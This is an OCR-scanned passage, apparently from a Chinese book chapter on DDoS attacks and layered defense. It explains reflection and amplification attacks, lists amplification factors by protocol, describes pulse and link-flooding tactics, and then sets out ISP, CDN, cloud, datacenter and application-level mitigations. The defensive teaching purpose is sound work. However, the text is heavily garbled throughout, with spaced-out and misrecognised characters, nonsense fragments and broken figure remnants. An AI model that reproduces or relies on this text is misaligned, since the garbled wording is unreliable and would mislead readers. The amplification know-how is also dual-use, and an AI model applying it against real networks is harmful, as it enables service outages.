过 将 SYN 包 的 源 地 址 设置 为 目标 地 址 ， 然 后 向 大 量 的 真实 TCP 服 务 器 发 
送 TCP 的 SYN 包 ， 而 这 些 收 到 SYN 包 的 TCP Server 为 了 完成 3 次 握手 把 
SYNIACK 包 “应 答 ?” 给 目标 地 址 ， 完 成 了 一 次 “反射 ?攻击 ， 攻 击 者 隐藏 了 
自身 ， 如 图 7-7 所 示 。 但 有 个 问题 是 攻击 者 制造 的 流量 和 目标 收 到 的 攻 
击 流量 是 1: 1， 且 SYNIACK 包 到 达 目 标 后 马上 被 回 以 RST 包 ， 整 个 攻击 
的 投资 回报 率 不 高 。 反 射 型 攻击 的 本 质 是 利用 “质询 -应 答 ” 式 协议 ， 将 
质询 包 的 源 地 址 通过 原始 套 接 字 伪 造 设 置 为 目标 地 址 ， 则 应 答 的 “ 回 














包 ? 者 被 发 送 至 目标 ， 如 果 回 包 体积 


比较 大 或 协议 文 持 递归 效果 ， 攻 击 


流量 会 被 放大 ， 成 为 一 种 高 性 价 比 的 流量 型 攻击 。 反 射 型 攻击 利用 的 协 


议 目 前 包括 NTP、Chargen、SSDP、 


携带 有 被 攻击 者 地 
址 的 Syn 数据 包 
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DNS, RPC Portmap 等 等 。 


TCP Server 
ta 








Syn/Ack 回应 数据 包 返 
回 到 被 攻击 者 的 主机 上 


图 7-7 反射 型 攻击 原理 图 


流量 放大 型 攻击 一 一 以 上 面 提 到 的 DRDOS 中 常见 的 SSDP 协 议 为 
例 ， 攻 击 者 将 Search type 设 置 为 ALL， 搜 索 所 有 可 用 的 设备 和 服务 ， 这 
种 递归 效果 产 生 的 放大 倍数 是 非常 大 的 ， 攻 击 者 只 需 以 较 小 的 伪造 源 地 
址 的 查询 流量 就 可 以 制造 出 几 十 其 全 上 百倍 的 应 答 流量 发 送 人 至 目标。 常 
见 反 射 式 攻击 放大 倍数 参见 表 7-1。 








脉冲 型 攻击 一 一 很 多 攻击 持续 的 时 间 非 常 短 ， 通 常 5 分 钟 以 内 ， 流 
量 图 上 表现 为 突 刺 状 的 脉冲 ， 如 图 7-8 所 示 。 


表 7-1 和 营 见 反射 型 攻击 放大 倍数 
































攻击 类 型 放大 售 数 
DNS 54 
NTP 556.9 
SNMPv2 6.3 
NetBIOS 3.8 
SSDP 30.8 
CharGEN 358.8 
QOTD 140.3 
BitTorrent 3.8 
Kad 16.3 
Quake Network Protocol 63.9 
Steam Protocol 55 
Multicast DNS (mDNS) 10 
RIPv1 131.24 
Portmap (RPCbind) 28 























图 7-8 “脉冲 型 DDoS 流量 特征 


这 样 的 攻击 之 所 以 流行 ， 是 因为 " 打 - 打 - 停 - 停 的 效果 最 好 ， 刚 触 
发 防御 装 值 ， 防 御 机 制 开 始 生效 攻击 束 停 了 ， 周 而 复 始 。 蚊 子 不 叮 你 ， 
却 在 耳 边 飞 ， 刚 开 灯 想 打 它 融 跑 没 影 了 ， 当 你 刚 关 灯 它 又 来 了 ， 你 就 没 
法 睡觉。 





自动 化 的 防御 机 制 大 部 分 都 是 依 徘 设置 阐 值 来 触发 。 尽 定 很 多 厂商 
宣称 自己 的 防御 措施 都 是 秒 级 啊 应 ， 但 实际 上 比较 难 。 








网 络 层 的 攻击 检测 通常 分 为 逐 流 和 逐 包 ， 第 一 种 逐 流 检测 是 根据 
netflow 以 一 定 的 抽样 比例 (例如 1000: 1) 检测 网 络 是 否 存在 DDoC 攻 
击 ， 这 种 方式 因为 是 抽样 比例 ， 所 以 精确 度 较 低 ， 做 不 到 秒 级 啊 应 。 第 








二 种 逐 包 检测 ， 检 测 精 度 较 高 且 响 应 时 间 较 短 ， 但 成 本 比较 高 ， 一 般 厂 
商都 不 会 无 视 TCO 全 部 部 普 这 类 方案 。 即 便 用 逐 包 检测 ， 其 防御 清洗 策 
略 的 局 动 也 依赖 于 国 值 ， 加 上 清洗 设备 一 般 情 况 下 不 会 串联 部 普 ， 触 发 
清洗 后 需要 引流 ， 因 此 大 部 分 场景 可 以 做 秒 级 检测 但 做 不 到 秒 级 防御 。 
近 源 清洗 尚且 如 此 ， 云 清洗 的 触发 和 转换 过 程 就 更 慢 了 。 所 以 利用 防御 
规则 的 生效 灰 度 期 ， 在 触发 防御 前 完成 攻击 会 有 不 错 的 效果 ， 在 结果 上 
束 表 现 为 脉冲 。 

















' 链 路 泛 洪 型 攻击 一 一 随 着 DDoS 攻击 技术 的 发 展 ， 又 出 现 了 一 种 新 
型 的 攻击 方式 : 链 路 泛 洪 〈link-flooding) ， 这 种 方式 不 直接 攻击 目 
标 ， 而 是 以 堵 竖 目标 网 络 的 上 一 级 链 路 为 目的 。 对 于 使 用 了 IP anycast 的 
企业 网 络 来 说 ， 负 规 的 DDoS 攻击 流量 会 被 “分 摊 " 到 不 同 地 址 的 基础 设 
施 ， 这 样 能 有 效 缓解 大 流量 攻击 ， 所 以 攻击 者 发 明了 一 种 新 方法 ， 攻 击 
至 目标 网 络 traceroute 的 倒数 第 二 跳 ， 即 上 联 路 由 ， 致 使 链 路 拥塞 。 国 内 
ISP 目 前 未 开放 anycast， 所 以 这 种 攻击 方式 的 必要 性 有 待 观望， 如 图 7-9 
所 示 。 





网 络 用 户 


图 7-9” 链 路 泛 洪 示意 网 


对 一 级 ISP 和 IXP 的 攻击 都 可 以 使 链 路 拥塞 。 


7.2.2 ”多 层 防御 结构 





DDoS 攻击 本 质 上 是 一 种 只 能 绥 解 而 不 能 完全 防御 的 攻击 ， 它 不 像 
漏洞 那样 打 个 补丁 就 是 完全 解决 了 ，DDoS 就 算 购买 和 部 署 了 当前 市 场 
上 比较 有 竞争 力 的 防御 解决 方案 也 完全 谈 不 上 彻底 根治 。 防 火 墙 、 
IPS、WAF 这 些 安全 产品 都 号 称 自己 有 一 定 的 抗 DDoS 能 力 ， 而 实际 上 它 
们 只 和 针对 小 流量 下 应 用 层 的 攻击 比较 有 效 ， 对 于 稍 大 流量 的 DDoS 攻 击 
则 无 济 于 事 。 











以 2015 年 年 中 的 情况 为 例 ， 国 内 的 DDoS 攻击 在 一 个 月 内 攻击 流量 
超过 300G 的 就 有 20 次 左右 ， 这 个 数值 将 随 着 国内 家 庭 宽带 网 速 提升 而 
进一步 放大 。 对 于 200~500G 的 攻击 流量 该 如 何 防御 ， 下 面 将 展示 完整 
的 防御 结构 ， 通 常 可 以 分 为 4 屋 ， 如 图 7-10 所 示 。 





第 — JZ: ISP 
近 源 清洗 
第 二 层 ， 云 清洗 
_/CDN pi 
第 三 层 : DC 级 
近 目 的 清洗 


图 7-10 DDoS 纵深 防御 体系 


这 4 层 不 是 严格 意义 上 的 纵深 防御 结构 ， 也 不 是 在 所 有 的 防御 中 都 
需要 4 层 ， 可 能 有 时 候 只 需要 其 中 的 2 层 。 但 对 于 超大 流量 攻击 而 言 ， 就 














是 需要 4 层 防 御 机 制 ， 再 没有 其 他 手段 了 。 跟 厂商 的 市 场 宣传 可 能 有 所 
不 同 ， 大 流量 攻击 的 防护 并 不 是 徘 广 商 单 方面 束 能 解决 ， 而 是 进行 多 层 
防御 才 有 效 。 











1.ISP/WAN}= 





这 一 层 通 第 对 最 终 用 户 不 可 见 ， 如 果 只 是 中 小 企业 ， 那 这 一 层 可 能 
真 的 不 会 接触 到 。 但 如 果 是 大 型 互联 网 公司 、 公 有 云 厂 商 ， 甚 至 是 云 清 
洗 厂商 ， 这 层 是 必 不 可 少 的 。 因 为 当 流 量 超过 上 自己 能 处 理 的 极限 时 ， 必 
须要 借助 电信 运营 商 的 能 力 。 大 型 互联 网 公司 虽然 自身 储备 的 带宽 比较 
大 ， 但 还 没 到 达 轻 松 抵抗 大 流量 DDoS 的 程度 ， 毕 竟 带 宽 是 所 有 IDC 成 
本 中 最 贵 的 资源 ， 没 有 之 一 。 目 前 无 论 是 云 计算 厂商 、 大 型 互联 网 公司 
问 外 宣称 的 成 功 抵御 200G 以 上 攻击 的 新 闻 背 后 都 用 到 了 运营 商 的 抗 D 能 
力 ， 力 外 像 第 三 方 的 云 清 洗 平 台 实 际 上 或 多 或 少 地 依赖 电信 运营 商 ， 如 
果 只 依 徘 本 映 的 清洗 能 力 ， 部 是 非常 有 限 的 。 























目前 ， 中 国电 信和 专门 做 抗 DDoS 的 云 坦 提供 了 “流量 压制 ”和 “ 近 源 清 
洗 ” 的 服务 如 图 7-11 所 示 〉， 尝 量 压制 是 一 种 分 方 同 的 黑洞 路 由 ， 对 
于 购买 其 服务 的 三 丙 来 说 可 以 目 定 义 需 要 黑洞 路 由 的 IP， 并 选择 在 哪些 
国家 及 省 份 上 生效 ， 如 图 7-12 所 示 。 黑 洞 路 由 是 一 种 简单 粗暴 的 方法 ， 
除了 攻击 流量 ， 部 分 真实 用 户 的 访问 也 会 被 一 起 黑洞 挥 ， 对 用 户 体 验 是 
一 种 打折 扣 的 行为 。 但 因为 攻击 流量 分 布 与 业务 流量 分 布 往往 区 别 较 








大 ， 根 据 受 攻击 时 ， 业 务 与 攻击 流量 具体 分 布 ， 在 某 些 攻击 流量 特别 大 
而 用 户 流量 极 小 的 方向 上 进行 黑洞 路 由 ， 可 以 在 保证 大 部 分 业务 前 提 下 
解决 边缘 带宽 拥 旱 问题， 这 对 具备 一 定 带宽 储备 和 清洗 能 力 但 仍 需 保证 
出 口 带宽 的 云 清洗 厂商 特别 有 意义 ， 对 中 小 型 网 站 用 户 体 验 影 响 较 大 。 


近 目 的 清洗 
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图 7-11 ” 近 源 清洗 示意 图 








压制 IP: Q 例如 :142201 
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图 7-12 ”电信 云 坤 移动 端 管理 界面 


相 比 之 下 ， 近 源 清 洗 可 以 在 靠近 攻击 源 位 置 对 攻击 进行 清洗 ， 在 几 
乎 不 增加 时 延 的 前 提 下 完成 流量 清洗 。 这 种 对 攻击 流量 的 牵引 、 清 洗 、 
回 注 的 防御 方式 对 用 户 体 验 的 挑战 没 那 么 大 ， 但 是 跟 黑 洞 路 由 比 防御 方 
的 成 本 比较 高 ， 且 触发 到 响应 的 延 时 较 大 。 


在 运营 商 防御 这 一 层 的 主要 的 参与 者 是 大 型 互联 网 公司 、 公 有 云 三 
商 、 云 清洗 广 商 ， 其 最 大 的 意义 在 于 应 对 超过 自身 带宽 储备 和 上 自身 
DDoS 防御 能 力 之 外 的 超大 攻击 流量 时 作为 补充 性 的 缓解 措施 。 


2.CDN/Internet 层 


CDN 并 不 是 一 种 抗 DDoS 的 产品 ， 但 对 于 Web 类 服务 而 言 ， 却 正好 
有 一 定 的 抗 DDoS 能 力 。 以 大 型 电 丙 的 抢购 为 例 ， 这 个 活动 的 访问 量 非 
常 大 ， 从 很 多 指标 上 看 不 亚 于 DDoS 的 CC， 而 在 平台 侧 实 际 上 在 CDN 层 
面 用 验证 码 过 小 了 绝 大 多 数 请 求 ， 最 后 到 达 数 据 库 的 请 求 只 占 整 体 请 求 


量 的 很 小 一 部 分 。 





对 HTTP CC 类 型 的 DDoS， 不 会 直接 到 源 站 ，CDN 会 先 通 过 自身 的 
带宽 硬 抗 ， 抗 不 了 的 或 者 穿 透 CDN 的 动态 请 求 会 到 源 站 ， 如 果 源 站 前 端 
的 抗 DDoS 能 力 或 者 源 站 前 的 带宽 比较 有 限 ， 就 会 被 彻底 DDoS 。 


云 清洗 三 商 提出 的 策略 是 ， 预 先 设置 好 网 站 的 CNAME， 将 域名 指 
向 云 清洗 广 商 的 DNS 服务 器 ， 在 一 般 情况 下 ， 云 清洗 厂商 的 DNS 仍 将 罕 
透 CDN 的 回 源 的 请 求 指向 源 站 ， 在 检测 到 攻击 发 生 时 ， 域 名 指向 自己 的 
清洗 集群 ， 然 后 再 将 清洗 后 的 流量 回 源 ， 检 测 方式 主要 是 在 客户 网 站 前 
部 署 反 向 代理 (Nginx) ， 托 管 所 有 的 并 发 连接 。 在 对 攻击 流量 进行 分 
流 的 时 候 ， 准 备 好 一 个 域名 到 IP 的 地 址 池 ， 当 IP 被 攻击 时 封禁 并 启用 地 
址 池 中 的 下 一 个 IP， 如 此 往复 。 











以 上 是 类 Cloudflare 的 解决 方案 ， 国 内 云 清 洗 厂 两 的 实现 原理 都 相 
似 ， 如 图 7-13 所 示 。 


攻击 源 : 
IP2 







100Gbps = DDoS 
清洗 中 心 


80Gbps 的 DDoS 
清洗 中 心 


图 7-13 ” 云 清洗 示意 图 


不 过 这 类 方案 都 有 一 个 通病 ， 由 于 国内 环境 不 文 持 anycast， 通 过 
DNS 引流 的 方式 需要 比较 长 的 生效 时 间 ， 这 个 时 间 依 赖 于 DNS 递归 生效 
的 时 长 ， 对 目 身 完全 不 可 控 ， 很 多 用 户 使 用 的 DNS 递归 服务 器 最 小 TIL 
值 长 达 24 小 时 。 同 时 CDN 仅 对 Web 类 服务 有 效 ， 对 游戏 类 TCP 和 下 连 的 服 


网 上 很 多 使 用 此 类 抗 D 服 务 的 过 程 可 以 概括 为 一 句 话 : 更改 
CNAME 指 同 ， 等 竺 DNS 递 归 生 效 。 


spc] 


Datacenter 这 一 层 的 DDoS 防御 属于 近 目 的 清洗 ， 就 是 在 DC 出 口 的 
地 方 部 署 ADS 设 备 。 


产品 照片 如 图 7-14 所 示 。 





AntiDDoS8030 AntiDDoS8080 AntiDDoS8160 


图 7-14 ”华为 AntiDDoS 8000 系 列 产品 





目前 国内 厂商 华为 的 AntiDDoS 产 品 的 最 高 型 号 支持 T 级 高 达 
1440Gbps 带 宽 的 防护 ， 产 品系 列 如 图 7-14 所 示 。DC 级 清晰 方案 的 原理 
如 图 7-15 所 示 ， 在 DC 出 口 以 镜像 或 分 光 部 署 DDoS 探 针 〈 检 测 设备 )， 
当 检 测 到 攻击 发 生 时 ， 将 流量 牵引 到 旁 路 部 署 的 DDoS 清洗 设备 ， 再 将 
经 过 清洗 的 正常 流量 回 注 到 业务 主机 ， 以 此 完成 一 轮 闭 环 。 
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DDoS 清洗 中 心 





图 7-15 ”DC 级 清洗 方案 








部 署 设备 本 身 并 没有 太 大 的 技术 含量 ， 有 技术 含量 的 部 分 都 已 经 作 
为 防御 算法 封装 在 产品 盒子 里 了 。 不 过 要 指出 的 一 点 是 ， 目 前 市 场 上 的 
ADS 盒 子 既 有 的 算法 和 学 习 能 力 是 有 限 的， 仍然 需要 人 的 介入 ， 比 如 : 


对 业务 流量 基线 的 目 适 应 学 习 能 力 是 有 限 的 ， 例 如 电 商 行业 双 11 
大 促 日 子 的 流量 模型 可 能 就 超越 了 ADS 的 学 习 能 力 ， 正 常 流量 已 经 触发 


攻击 判定 。 





-自动 化 触发 机 制 建立 在 阀 值 之 上 ， 就 意味 着 不 是 完全 的 自动 化 ， 
因为 国 值 是 一 个 经 验 和 业务 场景 相关 的 值 。 


全 局 策略 是 通用 性 策略 ， 不 能 对 每 一 个 子 业 务 起 到 很 好 的 防御 效 
末 ， 有 可 能 子 业务 已 经 被 D 了 ， 全 局 策略 还 没 触发 。 


种 见 的 DDoS 类 型 ADS 可 以 自动 处 理 ， 但 变换 形式 的 DDoS 类 型 可 


能 还 需要 人 工 识 别 。 
默认 的 模板 策略 可 能 不 适用 于 茶 些 业务 ， 需 要 目 定义 。 


DDoS 防御 除了 整体 架构 设计 外 ， 比 较 需 要 专业 技能 的 地 方 就 是 在 
上 述 例子 的 场景 中 。 目 前 在 ADS 设 备 里 履 关 了 3~4、7 这 三 层 的 解决 方 





案 。 表 7-2 是 常见 ADS 设 备 的 功能 简介 。 


表 7-2 常见 ADS 设 备 功能 





IPv4 威胁 防御 类 型 
异常 过 滤 
协议 漏洞 威胁 防护 


传输 层 威胁 防护 


黑 名 单 /基于 HTTP 协议 字段 的 过 滤 /TCP/UDP/other 协议 负载 特征 过 渡 

IP Spoofing, LAND 攻击 、Fraggle 攻击 、Smurf 攻 击 、Winnuke 攻 击 、Ping of 
Death 攻击 、Tear Drop 攻击 、IP Option 控制 攻击 、IP 分 片 控 制 报 文 攻击 、TCP 标记 
合法 性 检查 攻击 、 超 大 ICMP 控制 报 文 攻击 、ICMP 重 定向 控制 报 文 攻击 、ICMP 不 
可 达 控 制 报 文 攻击 等 

SYN flood 攻击 、ACK flood 攻击 、SYN-ACK flood 攻击 、FIN/RST flood 攻击 、 
TCP fragment flood 攻击 、UDP flood % i, UDP fragment flood 攻击 、ICMP flood 
等 





扫描 窥探 型 威胁 防护 


端口 扫描 攻击 、 地 址 扫描 攻击 、TRACERT 控制 报 文 攻击 、IP 源 站 选 路 选项 攻击 、 
IP 时 间 戳 选项 攻击 、 卫 路 由 记录 选项 攻击 等 





DNS 威胁 防护 


Web 威胁 防护 


虚假 源 DNS query flood 攻击 、 真 实 源 DNS query flood 攻击 、DNS reply flood 攻 
击 、DNS 缓存 投 毒 攻击 、DNS 协议 漏洞 攻击 等 

HTTP get /post flood 攻击 、CC 攻击 、HTTP slow header/post 攻击 、HTTPS flood 
Wik, SSL DoS/DDoS 攻击 、TCP 连接 耗 尽 攻击 、Sockstress 攻击 、TCP 重 传 攻击 、 
TCP 空 连接 攻击 等 





VOIP 威胁 防护 


僵 木 蠕 威胁 防护 


IPv6 威胁 防御 类 型 


SIP flood 


( 续 ) 


200+ 流 行 僵尸 木马 蠕虫 防护 ， 如 : LOIC、HOIC、Slowloris、Pyloris、Http- 
DosTool, Slowhttptest, The-ssl-dos, HEP. FM DDOS、 风 云 白 金 、 小 鱼 重 装 
等 主流 僵尸 网 络 工 具 





IPv6 威胁 防御 类 型 


ICMP Fragment 报 文 攻击 、 黑 名 单 过 滤 、 基 于 HITP 协 议 字 段 的 过 滤 、 支 持 
TCP/UDP/other 协议 负载 特征 过 滤 、SYN flood 攻击 、ACK flood 攻击 、SYN-ACK 
flood 攻击 、FIN/RST flood 攻击 、TCP fragment flood 攻击 、UDP flood 攻击 、UDP 
fragment flood 攻击 、ICMP flood 攻击 、 虚 假 源 DNS query flood 攻击 、 真 实 源 DNS 
query flood 攻击 、DNS reply flood Wit, DNS 缓存 投 毒 攻击 、DNS 协议 漏洞 攻击 、 
Fast flux 僵尸 网 络 、HTTP get /post flood 攻击 .CC 攻击 .HTTP slow header/post 攻击 、 
HTTPS flood 攻击 、SSL DoS/DDoS 攻击 、TCP 连接 耗 尽 攻击 Sckstress 攻击 、TCP 
重 传 攻击 、TCP 空 连接 攻击 、SIP flood 等 





IPv4/IPv6 双 栈 防御 





支持 


一 般 情况 下 ADS 设 备 可 以 缓解 大 部 分 常见 的 DDoS 攻击 类 型 ， 相 对 
而 言 3-4 层 的 攻击 手法 比较 固定 ， 而 7 层 的 攻击 ， 由 于 涉及 的 协议 较 多 ， 
手法 变化 层出不穷 ， 所 以 ADS 有 时 候 对 7 层 的 防护 做 不 到 面面俱到 ， 比 
如 对 CC，ADS 提 供 了 HTTP 302、 验 证 码 等 ， 但 还 是 不 能 很 好 地 解决 这 
个 问题 。 应 用 层 的 防护 需要 结合 业务 来 做 ，ADS 则 在 能 利用 的 场景 下 承 


担 辅助 角色 ， 比 如 对 于 游戏 封包 的 私有 协议 ， 通 过 给 packet 添 加 指纹 的 
方式 ，ADS 在 客户 端 和 服务 端 中 间 鉴 别 流入 的 数据 包 是 人 否 包含 指纹 。 


4.0S/APP 层 


这 是 DDoS 的 最 后 一 道 防线 。 这 一 层 的 意义 主要 在 于 漏 过 ADS 设 备 
的 流量 做 最 后 一 次 过 滤 和 缓解 ， 对 ADS 防 护 不 了 的 应 用 层 协议 做 补充 防 
护 。 比 如 NTP 反 射 ， 可 以 通过 服务 器 配置 禁用 monlist， 如 果 不 提供 基于 
UDP 的 服务 ， 可 以 在 边界 上 直接 阻 断 UDP 协议 。 





互联 网 在 线 服务 中 最 大 的 比重 就 是 web 服务， 因此 有 些 互联 网 公司 
喜欢 自己 在 系统 层面 去 做 应 用 层 的 DDoS 防护 ， 例 如 对 抗 CC， 有 时 这 些 
功能 也 能 顺带 关联 到 业务 安全 上 ， 比 如 针对 黄牛 抢 单 等 。 


实现 方式 可 以 是 web 服 务 器 模块 ， 也 可 以 是 独立 部 署 的 劳 路 系统 ， 
有 反问 代理 将 完整 的 HTTP 请 求 转发 给 检测 服务 器 ， 检 测 服 务 器 根据 几 方 
面 的 信息 ， 如 图 7-16 所 示 : 


-来自 相同 IP 的 并 发 请 求 。 
:相同 ip+cookie 的 并 发 请 求 。 
相同 HITP 头 部 可 设置 字段 。 


.相同 的 request URL 


d 相同 HTTP 


相同 cookie 头 部 字段 
&URL 





aie 


图 7-16 七 层 HTTP 抗 DDoS 示意 图 


APP 服务 器 


然后 保存 客户 器 的 连接 信息 计数 表 ， 例 如 单位 时 间 内 相同 了 +cookie 
再 次 发 起 连接 请 求 则 此 客户 闪 卫 的 计数 器 +1， 直 到 触发 国 值 ， 然 后 服务 
器 会 进行 阻 断 。 为 了 避免 误杀 ， 也 可 以 选择 性 地 弹出 验证 人 码 。 


以 上 是 拿 CC 防 御 举 了 个 例子 ，ADS 设 备 本 身 提供 了 HTTP 302 跳 
转 、 验 证 码 、Java-Script 解 析 等 防御 方式 ， 尽 管 OSB 和 应 用 层 可 以 做 更 多 
的 事情 ， 但 毕竟 有 自己 去 开发 和 长 期 维护 的 代价 ， 这 个 收益 要 看 具体 情 











大 部 分 介绍 DDoS 防御 策略 的 文章 里 似乎 很 少 提 及 这 一 点 : 增加 带 


宽 ， 但 这 个 方法 却 是 以 上 所 有 防御 的 基础 ， 例 如 第 二 层次 的 CDN 实 际 上 
就 是 拼 带 宽 ， 很 多 大 型 企业 选择 自 建 CDN， 本 质 上 就 是 自己 增加 带宽 的 
行为 。 除 了 CDN 之 外 ， 要 保障 DC 出 口 的 多 ISP 链 路 、 备 份 链 路 ， 到 下 层 
机 柜 交 换 机 的 带宽 都 不 存在 明显 的 单 点 瓶颈 ， 和 否则 抗 DDoS 的 处 理性 能 
够 了 ， 但 是 流量 流 经 某 个 节点 时 突然 把 一 个 杂牌 交 换 机 压 震 了 ， 最 后 的 


结果 还 是 表现 为 有 问题 。 











对 运 维 经 验 成 熟 的 互联 网 公司 而 言 ， 一 般 都 有 能 容 管 理 ， 对 于 促销 
活动 ， 高 峰 时 段 的 带宽 ，IDC 资 源 的 波峰 波 谷 都 有 预先 的 准备 ，DDoS 
防御 主要 是 消除 这 些 网 络 方案 中 内 在 的 单 点 瓶颈 。 


7.2.3 不 同类 型 的 企业 


DDoS 的 防御 本 质 上 属于 资源 的 对 抗 ， 完 整 的 4 层 防 御 效果 虽 好 ， 但 
有 一 个 明显 问题 就 是 TCO， 这 种 成 本 开销 互联 网 行业 排名 TOP10 以 外 的 
公司 基本 都 吃不消 。 就 算 付 得 起 这 钱 ， 在 IT 整体 投资 的 占 比 会 显得 过 
高 ， 付 得 起 不 代表 这 种 投资 是 正确 的 。 所 以 针对 不 同 的 企业 分 别 描述 
DDoS 缓解 方案 的 倾向 和 选择 性 。 


1 大 型 平 舍 公 司 





这 里 的 “大 ”有 以 下 几 层 意思 : 


公司 很 有 钱 ， 可 以 在 补贴 具体 的 业务 上 不 “ 太 ” 计 较 投 入 ， 对 土 聚 
来 说 只 选 效果 最 优 方案 。 

公司 不 一 定 处 在 很 赚钱 的 阶段 ， 但 IDC 投 资 规模 足够 大 ， 这 样 为 了 
保障 既 有 的 投入 ， 安 全 的 总 投资 维持 一 个 固定 百分比 也 是 非常 有 必要 
的 ， 在 IDC 盘 子 很 大 的 时 候 没 必要 省 “小 钱 ”。 





与 潜在 的 由 于 服务 中 断 造成 的 损失 比 ，DDos 防 御 的 投资 可 以 忽略 
不 计 。 


映射 到 现实 中 与 这 几 条 相关 的 公司 : 
-市值 100 亿 美元 以 上 互联 网 公司 。 
:大 型 公有 云 厂 商 ，IaaS、PaaS 平 台 。 


:利润 比较 高 的 业务 ， 比 如 游戏 、 在 线 支 付 假如 被 DDoS 的 频率 较 


[ 
Ayo 
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运营 商 ， 大 力 建 机 房 "， 在 拥有 全 部 的 DDoS 防御 机 制 的 前 所 下， 不 断 提 
高 IDC 基 础 设施 的 壁垒 给 攻击 者 制造 更 高 的 门槛 。 对 于 网 络 流量 比较 高 
的 公司 而 言 ， 抗 DDoS 是 有 先天 优势 的 ， 因 为 业务 急速 增长 而 带 来 的 基 
础 设施 的 扩容 无 意识 间 束 成 了 一 种 防御 能 力 。 但 对 于 没有 那么 大 业务 流 
EWA, EKHE REAA o 











对 于 比较 有 钱 ， 但 没 那么 多 线 上 服务 器 的 公司 而 言 ， 自 己 投 入 太 多 
IDC 建 设 可 能 是 没 必 要 的 ， 此 时 应 该 转向 通过 购买 的 手段 尽 可 能 获得 全 
部 的 DDoS 防御 机 制 。 





2. 中 小 企业 


资源 的 对 抗 衣 定 不 是 中 小 企业 的 强项 ， 所 以 追求 ROI 是 主要 的 抗 
DDoS 策略 。 第 一 种 情况 极度 省 钱 模 式 ， 平 时 和 裸奔， 直到 受 攻击 才 找 抗 
DDoS 上 厂商 临时 引流 ， 这 种 方案 效果 差 一 点 ， 但 绝 大 多 数 企 业 都 是 这 种 
心理 ， 得 过 且 过 ， 能 省 则 省 ， 这 也 无 可 厚 非 ， 不 过 过 到 关键 事件 要 知道 
上 哪儿 去 找 谁 ， 知 道 做 哪些 事 。 








第 二 种 情况 退 求 效果 ， 和 希望 有 性 价 比 高 的 方案 。 如 果 本 身 业 务 运行 
于 公有 云 平 台 ， 可 以 直接 使 用 云 平 台 提 供 的 抗 DDoS 能 力 ， 对 于 Web 类 
企业 可 以 考虑 提前 购买 云 清 洗 厂 商 的 服务 。 


7.2.4 不 同类 型 的 业务 


不 同 的 类 型 的 服务 所 需要 的 DDoS 防御 机 制 不 完全 相同 ， 所 以 不 能 
直接 拿 前 述 4 层 生 搬 硬 套 。 





1.Web 


对 于 Web 类 服务 ， 攻 击发 生 时 终端 用 户 可 以 有 一 定 的 延迟 容忍 ， 在 
防御 机 制 上 4 层 全 部 适用 ， 大 型 平台 的 一 般 都 是 4 层 全 部 拥有 ， 规 模 小 一 
点 的 企业 一 般 购 买 云 清洗 ，cloudflare 类 的 服务 即 可 。 


2. 游 戏 类 


Web API 形 式 的 轻 游 戏 跟 Web 服 务 类 似 ， 而 对 于 TCP socket 类 型 的 
大 型 网 游 ， 稍 有 延迟 很 影响 用 户 体验 ， 甚 至 很 容易 掉 线 。 云 WAF、 
CDN 等 措施 因为 是 针对 Web 的 ， 所 以 在 该 场景 下 无 效 ， 只 有 通过 DNS 引 
流 和 ADS 来 清洗 。ADS 不 能 完美 防御 的 部 分 可 以 通过 修改 客户 端 、 服 务 
端的 通信 协议 做 一 些 辅助 性 的 小 动作 ， 例 如 封包 加 tag 标 签 ， 检 测 到 没 
有 tag 的 包 一 律 丢弃 ， 防 御 机 制 基本 都 依赖 于 信息 不 对 称 的 小 技巧 。 
DNS 引流 的 部 分 对 于 有 HTTPDNS 的 厂商 可 以 借助 其 缓解 DNS 递归 生效 
的 时 间 。 








7.2.5 ”服务 策略 


:分 级 策略 一 一 对 于 平台 而 言 ， 如 果 有 些 服务 被 DDoS 会 导致 全 站 服 
务 不 可 用 ,例如 DNS 不 可 用 则 相当 于 全 线 服 务 不 可 用 ， 对 于 强 账 号 体系 
应 用 ， 例 如 电 商 、 游 戏 等 ， 如 果 SSO 登 录 不 可 用 则 全 线 服 务 不 可 用 ， 攻 
击 者 只 要 击 垮 这 些 服务 就 能 做 到 * 擒 贼 扒 王 ”。 所 以 安全 上 也 需要 考虑 针 
对 不 同 的 资产 使 用 不 同等 级 的 保护 策略 ， 根 据 BCM 的 要 求 ， 先 将 资产 





> 


类 分 级 ， 划 分 出 不 同 的 可 用 性 SLA 要 求 ， 然 后 根据 不 同 的 SLA 实 施 不 
同 级 别 的 防护 ， 在 具体 防护 策略 上 ， 能 造成 平台 级 SPOF ( 单 点 故障 ) 
的 服务 或 功能 应 投入 更 高 成 本 的 防御 措施 ， 所 谓 更 高 成 本 不 仅 指 购买 更 
多 的 ADS 设 备 ， 同 时 可 以 建立 多 灾 备 节点 ， 并 且 在 监控 和 啊 应 优先 级 上 
应 该 更 高 。 








-Failover 机 制 一 -DDoS 防御 不 只 是 依赖 于 DDoS 防御 的 那 4 层 手 段 ， 
同时 依赖 于 基础 设施 的 强大 ， 例 如 做 分 流 ， 就 需要 多 点 异地 灾 备 ， 
mirror site & hot site & standby system， 云 上 的 系统 需要 路 AZ 部署， 这 些 
是 可 以 随时 切换 的 基础 。 把 鸡蛋 放 在 一 个 篮子 里 会 导致 没什么 选择 。 





基础 设施 和 应 用 层面 建立 元 余 是 技术 形式 上 的 基础 ， 光 有 这 些 还 
远 不 够 ， 需 要 有 与 之 配套 的 DRP&BCP 策 略 集 ， 并 且 需 要 真实 的 周期 性 
的 演练 ， 意 在 遇 到 超大 流量 攻击 时 能 够 从 容 应 对 。 





.有 损 服务 一 一 在 应 用 服务 设计 的 时 候 ， 应 该 尽量 避免 “ 单 点 瓶 
颈 ”， 避 免 一 个 点 被 DDoS 了 整个 产品 就 不 好 用 了 ， 而 是 希望 做 到 某 些 服 
务 即使 关闭 或 下 线 了 ， 仍 然 不 影响 其 他 在 线 的 服务 〈 或 功能 ) ， 能 在 遇 
到 需要 弃 卒 保 帅 的 场景 时 有 可 以 “割肉 ”的 选择 ， 不 要 除了 “0 就 是 “1?， 

是 要 存在 灰 度 ， 比 如 原来 10 个 服务 在 线 ， 遇 到 攻击 时 我 只 要 保底 重要 
的 3 个 服务 在 线 即 可 。 











补充 手段 





DDoS 攻击 的 目的 不 一 定 完全 是 出 于 想 打 震 服务， 比如 以 前 在 做 游 
戏 时 遇 到 玩家 DDoS 服务 器 的 目的 葛 然 是 因为 没 抢 到 排 在 第 一 的 房间 
这 种 因素 通过 产品 设计 就 可 以 根治 。 而 有 很 多 应 用 层 DDoS 只 是 为 了 达 
成 另外 一 种 目的 ， 都 跟 上 述 4 层 纵深 防御 机 制 无 关 ， 而 跟 产 品 设 计 有 
